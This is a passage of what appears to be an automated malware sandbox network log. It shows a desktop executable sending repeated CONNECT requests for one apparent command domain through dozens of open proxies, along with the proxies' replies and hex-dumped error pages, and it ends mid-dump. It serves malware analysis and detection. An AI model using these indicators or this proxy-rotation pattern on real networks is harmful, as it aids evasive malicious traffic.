                                                                                                      294192.168.2.45061541.231.37.7631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.396632910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.419889927 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      295192.168.2.450652202.159.35.734436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.409317017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      296192.168.2.45063650.250.56.12998986812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.412904978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      297192.168.2.450664202.159.35.734436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.431657076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      298192.168.2.450665202.159.35.734436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.433557034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      299192.168.2.450666202.159.35.734436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.434272051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      300192.168.2.450317111.225.152.10080896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.475491047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.415436983 CET39INHTTP/1.1 200 Connection established
                                                                                                      Feb 23, 2024 09:45:23.248898983 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      301192.168.2.450653172.67.181.197806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.498157978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.585536003 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      302192.168.2.45063872.210.252.13741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.502635956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      303192.168.2.450668104.23.126.8806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.528655052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.621964931 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      304192.168.2.450444117.3.202.14080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.537235022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.680566072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.086070061 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      305192.168.2.45064172.210.208.10141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.548863888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      306192.168.2.450650192.252.208.67142876812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.550684929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      307192.168.2.450434128.199.221.91267896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.557343006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.612370014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.615339041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.647391081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.646886110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.647001982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      308192.168.2.4506268.213.137.1555436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.566693068 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:20.256472111 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:22.547832012 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      309192.168.2.45062027.65.116.24310806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.576358080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      310192.168.2.45062314.103.24.2080006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.582921982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.926924944 CET309INHTTP/1.1 502 Bad Gateway
                                                                                                      Server: nginx/1.19.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.19.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      311192.168.2.45066798.170.57.23141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.598839998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      312192.168.2.450670174.77.111.19641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.611171961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      313192.168.2.45067198.178.72.21109196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.619083881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      314192.168.2.450673138.68.60.831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.619476080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.903316975 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      315192.168.2.450457193.151.109.12931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.622338057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.740732908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.834506035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.258613110 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      316192.168.2.450700104.21.6.88806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.623928070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.711517096 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      317192.168.2.450684170.245.57.22880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.634567976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      318192.168.2.450706104.27.15.161806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.639920950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.727157116 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      319192.168.2.45068224.249.199.1241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.640616894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      320192.168.2.450686184.178.172.13153116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.669843912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      321192.168.2.45069072.195.114.16941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.682720900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      322192.168.2.450648211.222.252.187806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.683149099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      323192.168.2.450694104.238.111.107562256812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.683248997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.146835089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.739480019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      324192.168.2.450183128.199.252.2280006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.698390007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.033211946 CET19INHTTP/1.0 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      325192.168.2.450485103.153.63.21180856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.709917068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.740679979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.480005980 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      326192.168.2.45069689.168.121.17531286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.722692966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.923995018 CET1286INHTTP/1.1 500 Internal Server Error
                                                                                                      Server: squid/6.2-VCS
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 1112
                                                                                                      X-Squid-Error: ERR_CANNOT_FORWARD 0
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 45 52 52 5f 43 41 4e 4e 4f 54 5f 46 4f 52 57 41 52 44 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 3e 45 52 52 4f 52 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65 74 72 69 65 76 65 20 74 68 65 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 3c 70 3e 3c 62 3e 53 68 69 65 6c 64 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 6f 72 77 61 72 64 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 65 64 20 75 70 73 74 72 65 61 6d 2e 2e 3c 2f 